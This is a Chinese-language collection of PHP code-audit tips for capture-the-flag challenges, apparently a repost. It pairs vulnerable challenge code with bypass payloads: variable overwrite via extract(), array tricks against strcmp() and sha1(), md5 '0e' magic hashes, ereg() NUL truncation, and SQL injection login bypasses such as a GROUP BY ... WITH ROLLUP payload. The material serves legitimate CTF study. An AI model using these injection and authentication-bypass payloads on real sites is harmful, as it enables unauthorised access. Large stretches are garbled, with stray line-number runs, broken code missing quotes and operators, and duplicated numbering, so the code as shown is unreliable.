

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報(bào)或認(rèn)領(lǐng)


ctf中的php代碼審計技巧(作者:未知;原文鏈接:/ctf/200.html;2017-02-07)

做 CTF 題時常會碰到代碼審計題,翻翻這份記錄可以很快找到思路。下面每一題先列出關鍵函數與 payload,再附原題代碼。注意:原文代碼在轉載時丟失了引號、方括號、花括號和重複字元(例如 == 變成 =、++ 變成 +),此處只按 PHP 語法做最小還原,以題目原始來源為準。

1. extract() 變量覆蓋 + file_get_contents()。payload:?shiyan=&flag=1。
原理:extract($_GET) 會用請求參數直接覆蓋腳本中已定義的 $flag;file_get_contents('1') 打開不存在的文件時返回 false,trim(false) 得到空字符串,於是它與提交的空 $shiyan 做寬鬆比較(==)時相等。

原題代碼:$flag=xxx; extract($_

GET); if(isset($shiyan)) $content=trim(file_get_contents($flag)); if($shiyan==$content) echo "ctfxxx"; else echo "Oh.no";

2. 回文數題(兩處取值不一致)。代碼先對每個 $_REQUEST 的值做 trim() 再 addslashes() 存入 $req,但後面 is_numeric() 檢查的是原始的 $_REQUEST['number'],而整數檢查、回文檢查用的卻是處理過的 $req['number']。兩個檢查讀的不是同一個值,這就是突破口:只要在數字後面附加一個 trim() 會去掉、但 is_numeric() 不接受的字符(PHP 8 之前 is_numeric 不接受尾部空白),第一個檢查就認為「不是數字」,後續檢查仍拿到合法的整數。

原題代碼(片段):… $value) { $value = trim($value); is_string($value) && $req[$key] = addslashes($value); } fun

ction is_palindrome_number($number) { $number = strval($number); $i = 0; $j = strlen($number) - 1; while($i < $j) { if($number[$i] != $number[$j]) return false; $i++; $j--; } return true; }
if(is_numeric($_REQUEST['number'])) $info = "sorry, you cannt input a number!"; // 讀的是未經 trim 的原始值
elseif($req['number'] != strval(intval($req['number']))) $info = "number must

 be equal to its integer!"; // 讀的是 trim 過的 $req
else { $value1 = intval($req['number']); $value2 = intval(strrev($req['number'])); if($value1 != $value2) $info = "no, this is not a palindrome number!"; elseif(is_palindrome_number($req['number'])) $info = "nice! $value1 is a palindr

ome number!"; else $info = $flag; } echo $info;

3. unserialize() 注入。token 依次經 base64_decode → gzuncompress → unserialize 得到 $login,之後鑑權時比較的是 $login['user'](攻擊者完全可控的反序列化結果),而不是數據庫查出的 $row;因此偽造一個 user 為 ichunqiu 的序列化數組(生成方法見第 4 段)即可直接拿到 flag。mysql_real_escape_string() 只防住了 SQL 注入,防不住「信任反序列化結果」這個邏輯問題。

原題代碼:… $where) { $this->select($this->where); } function select($where) { $sql = mysql_query("select * from user where ".$where); // 直接拼接 MySQL 查詢
return mysql_fetch_array($sql); }
if(isset($requset['token'])) { $login = unserialize(gzuncompress(base64_decode($requset['token']))); // gzuncom

press: 解壓;unserialize: 反序列化
$db = new db(); $row = $db->select("user='".mysql_real_escape_string($login['user'])."'"); // mysql_real_escape_string() 只轉義引號,用來防 SQL 注入
if($login['user'] == 'ichunqiu') echo $flag; // 注意:比較的是反序列化出來的值,而不是查出的 $row
else if($row['pass'] != $login['pass']) echo "unserialize injection!"; else echo ( ) ; } else header("Location: index.php?error=1"); ?>

4. 構造第 3 題的 token:<?php $

7、arr = array(user => ichunqiu);$a = base64_encode(gzcompress(serialize($arr); echo $a;?>12345678910111213141516171819202122232425262728293031323334353637383940414243444546476PHP12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758<?php er

8、ror_reporting(0);if (!isset($_POSTuname) | !isset($_POSTpwd) echo <form action= method=post>.<br/> echo <input name=uname type=text/>.<br/> echo <input name=pwd type=text/>.<br/> echo <input type=submit />.<br/>echo </form>.<br/>echo <!-

source: source.txt -->".'<br/>'; die; }
function AttackFilter($StrKey, $StrValue, $ArrReq) { if (is_array($StrValue)) { $StrValue = implode($StrValue); } // 數組參數會先拼成字符串再過濾
if (preg_match("/".$ArrReq."/is", $StrValue) == 1) { print ""; exit(); } }
$filter = "and|select|from|where|union|join|sleep|benchmark|,|(|)"; // 黑名單:只攔這些關鍵字和符號,group/by/rollup/limit/offset 都不在其中
foreach($_POST as $key=>$value) { // 每個 POST 參數都過一遍黑名單

AttackFilter($key, $value, $filter); }
$con = mysql_connect("XXXXXX", "XXXXXX", "XXXXXX"); if (!$con) die("Could not connect: " . mysql_error()); $db = "XXXXXX"; mysql_select_db($db, $con); // 連接 MySQL
$sql = "SELECT * FROM interest WHERE uname = '$_POST[uname]'"; // 黑名單之外的內容原樣拼進 SQL
$query = mysql_query($sql); // 執行 MySQL 查詢
if (mysql_num_rows($query) == 1) { // 只接受恰好一行結果
$key

 = mysql_fetch_array($query); // 沒有結果時返回 false
if($key['pwd'] == $_POST['pwd']) print "CTFXXXXXX"; else print ""; } else print ""; mysql_close($con); ?>
思路:黑名單沒有攔 group/by/rollup/limit/offset。GROUP BY … WITH ROLLUP 會在結果末尾多出一行彙總行,其 pwd 列為 NULL;再用 LIMIT 1 OFFSET 1 只取這一行,mysql_num_rows() 恰為 1,而 $key['pwd'] 為 NULL,與提交的空 pwd 做 == 比較相等。payload 見後文 admin' GROUP BY … WITH ROLLUP … 一行。

5. ereg() 的 %00 截斷。payload:1e9%00*-*。ereg() 遇到 NUL 字節即停止匹配,所以只有前半段 1e9 參與「只能是字母數字」的正則;整串長度 7 < 8,而數字比較時按前導數字 1e9 = 1000000000 > 9999999 處理(PHP 8 之前的行為);strpos() 不受 %00 影響,仍能找到 *-*。

原題代碼:<?php if (isset ($_GET['password'])) { if (ereg ("^[a-zA-Z0-9]+$", $_GE

T['password']) === FALSE) echo "<p>You password must be alphanumeric</p>"; else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999) { if (strpos ($_GET['password'], "*-*") !== FALSE) die("Flag: " . $flag); else echo("<p>*-* have not been found</p>"); } else echo "<p>Invalid password&

lt;/p>"; } ?>

(前面 uname/pwd 題的 payload)uname 填:admin' GROUP BY password WITH ROLLUP LIMIT 1 OFFSET 1-- - ,pwd 留空。注意原文 payload 裡的列名是 password,而上面代碼裡讀的列是 pwd,實際使用時應以真實列名為準。

6. strcmp() 傳入數組。代碼:
if (isset($_GET['a'])) { if (strcmp($_GET['a'], $flag) == 0) { // 本意是做字符串比較
die("Flag: ".$flag); } else print ""; }
payload:?a[]=1。漏洞原理(原文鏈接:/functions/201.html):PHP 5.3+ 的 strcmp() 收到數組等非字符串參數時返回 NULL 並報警告,而 NULL == 0 為真。

7. sha1() 傳入數組。代碼:<?php if (isset($_GET['name']) and isset($_GE

T['password'])) { if ($_GET['name'] == $_GET['password']) echo '<p>Your password can not be your name!</p>'; else if (sha1($_GET['name']) == sha1($_GET['password'])) die('Flag: '.$flag); else echo '<p>Invalid password.</p>'; } else echo '<p>Login first!</p>'; ?>
原理(返回值退化為 bool/NULL):sha1

() 與 md5() 收到數組參數時不做哈希而直接返回 NULL(並給出警告;PHP 8 起改為拋出 TypeError),兩邊都是 NULL,== 比較成立;而兩個不同的數組本身並不相等,所以第一個檢查也能通過。payload:?name[]=a&password[]=b

8. session 密碼比較。代碼:<?php session_start(); if (isset ($_GET['password'])) { if ($_GET['password'] == $_SESSION['password']) die ("Flag: ".$flag); else print "<p>Wrong guess.</p>"; } mt_srand(microtime() rand(1, 10000) % rand(1, 10000) + rand(1, 10000)); ?> (microtime() 與 rand() 之間的運算符在轉載時丟失)
說明:mt_srand() 在比較之後才執行,對本次判斷沒有影響;若 $_SESSION['password'] 在本頁從未被賦值(此處看不到賦值代碼),它就是 NULL,而 NULL 與空字符串做 == 比較為真,提交空的 password 即可。這一點需結合完整題目確認。

9. 通過 SQL 注入讓查出的 pw 等於提交密碼的 md5。代碼:

16、1617181920212223242526272829303132333435<?phpif($_POSTuser && $_POSTpass) $conn = mysql_connect(*, *, *); mysql_select_db(phpformysql) or die(Could not select database); if ($conn->connect_error) die(Connection failed: . mysql_error($conn);$user = $_POSTuser;$pass = md5($_POSTpass);$sq

17、l = select pw from php where user=$user;$query = mysql_query($sql); if (!$query) printf(Error: %sn, mysql_error($conn); exit();$row = mysql_fetch_array($query, MYSQL_ASSOC);/echo $rowpw;if ($rowpw) && (!strcasecmp($pass, $rowpw) /str1str2< 0str1str2> 0 0echo <p>Logged in! Key:* &

lt;/p>"; } else echo("<p>Log in failure!</p>"); ?>
說明:$user 未經任何轉義就拼進 select pw from php where user='$user',因此可以通過構造 SQL 語句(例如用 union 自行返回一列)使查出的 $row['pw'] 等於 md5(提交的 pass),讓 strcasecmp() 返回 0。原文此處還提到 cookie/session,但相關說明已丟失。

10. 正則漏洞,%00 截斷(針對 ereg()/eregi() 這類遇到 NUL 字節即停止匹配的舊函數)。

11. 先檢查、後解碼。代碼:<?php if(eregi("hackerDJ", $_GET['id'])) { echo("<p>not allowed!</p>"); exit(); } $_GET['id'] = urldecode($_GET['id']); if($_GET['id'] == "hackerDJ") echo <p&

gt;Access granted!</p>"; echo "<p>flag: * </p>"; } ?>
說明:黑名單檢查在 urldecode() 之前執行,而最終比較在其之後。把字符串再做一次 URL 編碼(例如把其中某個字母寫成 %25xx,PHP 自動解碼一次後變成 %xx,此時 eregi 匹配不到,再經 urldecode() 才還原成 hackerDJ)即可通過。

11(續). 閉合注入,繞過驗證。代碼:<?php if($_POST['user'] && $_POST['pass']) { $conn = mysql_connect("*", "*", "*"); mysql_select_db("*") or die("Could not select database"); if ($conn->connect_error) die("Connection faile

20、d: . mysql_error($conn);$user = $_POSTuser;$pass = md5($_POSTpass);$sql = select user from php where (user=$user) and (pw=$pass);$query = mysql_query($sql); if (!$query) printf(Error: %sn, mysql_error($conn); exit();$row = mysql_fetch_array($query, MYSQL_ASSOC);/echo $rowpw;if($rowuser=admin) echo &

lt;p>Logged in! Key: * </p>"; if($row['user'] != "admin") echo("<p>You are not admin!</p>"); ?>
思路:閉合注入,繞過驗證。$user 直接拼進 (user='$user') and (pw='$pass'),用引號和括號閉合前半段、註釋掉後面的 pw 條件,讓查詢返回 user 為 admin 的那一行即可,密碼無需正確。

12. 信任客戶端可控的 IP 頭。代碼:<?php function GetIP() { if(!empty($_SERVER['HTTP_CLIENT_IP'])) $cip = $_SERVER['HTTP_CLIENT_IP']; else if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) $cip = $_SERVER['HTTP_X_FORWARDED_FOR']; else if(!

empty($_SERVER['REMOTE_ADDR'])) $cip = $_SERVER['REMOTE_ADDR']; else $cip = ""; return $cip; }
$GetIPs = GetIP(); if ($GetIPs == …) echo "Great! Key is *"; else echo …; ?> (被比較的 IP 值和 else 分支的輸出在轉載時丟失)
說明:Client-IP 與 X-Forwarded-For 都是請求方自己可以設置的 HTTP 頭,而且這裡它們的優先級高於 REMOTE_ADDR,所以只要添加對應的 HTTP 頭並填上題目要求的 IP 即可。真實系統中不應把這類頭當作客戶端 IP 的可信來源。

13. 240610708:神奇的數字。md5("240610708") 的結果以 "0e" 開頭、後面全是數字,在 PHP 寬鬆比較(==)下會被當成科學計數法的 0,因此能和其他同樣以 "0e" 開頭的哈希「相等」。

14. 同一原理的例題。代碼:<?php $md51 = md5('QNKCDZO'); $a = $_GET['a']; $md52 = md5($a); if(isset($a)) { if ($a != 'QNKCD

ZO' && $md51 == $md52) echo "nctf*"; else echo "false!"; } else echo "please input a"; ?>
說明:md5('QNKCDZO') 以 "0e" 開頭,提交另一個 md5 同樣以 "0e" 開頭、後接純數字的字符串(如上一條的 240610708),兩個哈希在 == 下都按 0 處理而相等,同時 $a 本身又不等於 QNKCDZO。

15. intval() 與原始值的不一致。代碼:<?php if($_GET['id']) { mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT, SAE_MYSQL_USER, SAE_MYSQL_PASS); mysql_select_db(SAE_MYSQL_DB); $id = intval($_GET['id']); $query = mysql_fetch

_array(mysql_query("select content from ctf2 where id=$id")); if ($_GET['id'] == 1024) echo "<p>no! try again</p>"; else echo($query['content']); } ?>
payload:?id=1024.1。查詢用的是 intval() 後的 1024,而「不許等於 1024」的檢查用的是原始字符串 1024.1(按數字比較 1024.1 != 1024),兩處取值不一致。原文註:此處還可以數組繞過。

16. ereg() 的 %00 截斷。代碼:if (isset ($_GET['nctf'])) { if (ereg ("^[1-9]+$", $_GET['nctf']) === FALSE) echo ""; else if (strpos ($_GET['nctf'], "#biubiubiu") !== FALSE) die("

Flag: ".$flag); else echo ""; }
說明:與第 5 題同理,ereg() 在 NUL 字節處停止匹配,只看到前面的數字部分,而 strpos() 會掃描整個字符串,仍能找到 #biubiubiu。另外 ereg() 和 strpos() 收到數組時都返回 NULL(帶警告),NULL === FALSE 不成立、NULL !== FALSE 成立,同樣能走到 die() 這一支,這應該就是上文「數組繞過」所指(推測)。

17.(代碼在本頁末尾被截斷)#GOAL: login as admin, then get the flag; error_reporting(0); require 'db.inc.php'; function clean($str) { if(get_magic_quotes_gpc()) $str = stripslashes($str); return htmlentities($str, ENT_QUOTES); } $username = clean((string)$_GET['username']); $password = clean((string)$_GET['password']); $query = "SELECT * FROM users WHERE name='".$username."' AND pass='".$password."'"; $result = mysql_query($query); if(!$result || mysql_num_row
(說明:htmlentities(…, ENT_QUOTES) 會把單雙引號轉成實體,所以普通的引號閉合在這裡不起作用;後續代碼已被截斷,無法判斷完整邏輯。)

